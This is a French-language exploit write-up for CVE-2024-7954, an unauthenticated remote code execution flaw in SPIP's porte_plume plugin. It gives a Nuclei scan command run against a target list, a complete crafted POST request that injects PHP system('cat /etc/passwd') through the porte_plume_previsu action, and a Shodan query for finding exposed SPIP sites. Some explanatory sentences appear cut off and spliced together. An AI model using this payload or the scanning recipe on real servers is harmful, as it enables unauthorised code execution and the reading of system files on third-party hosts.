
Exploit pour CVE-2024-7954, une RCE critique dans le plugin porte_plume de SPIP, avec une requête HTTP conçue et un modèle Nuclei pour l'analyse automatisée.
Le plugin porte_plume, utilisé par les versions de SPIP antérieures à 4.30-alpha2, 4.2.13 et 4.1.16, est vulnérable à une exécution de code arbitraire (RCE) critique. Cette faille permet à un attaquant distant non authentifié d'exécuter du code PHP arbitraire en tant qu'utilisateur SPIP en forgeant une requête HTTP spécifique. Le potentiel d'exploitation est grave, permettant à des attaquants d'exécuter des commandes malveillantes sur le serveur, ce qui pourrait entraîner un accès non autorisé, des violations de données ou une compromission ultérieure du système.
##Nuclei Analyse
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
Un exemple de requête HTTP forgée pouvant être utilisée pour exploiter cette vulnérabilité est le suivant :
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST est dirigée vers l'action porte_plume_previsu du fichier index.php de SPIP.system() de PHP pour exécuter une commande (dans ce cas, cat /etc/passwd), ce qui lit le contenu du fichier de mots de passe.system(), un attaquant pourrait exécuter n'importe quel code PHP sur le serveur, entraînant des conséquences graves.Pour identifier les installations SPIP potentiellement vulnérables, la requête Shodan suivante peut être utilisée :
app="SPIP"
Cette vulnérabilité souligne l'importance de maintenir les logiciels à jour et de mettre en œuvre des mesures de sécurité robustes pour se protéger contre l'exploitation.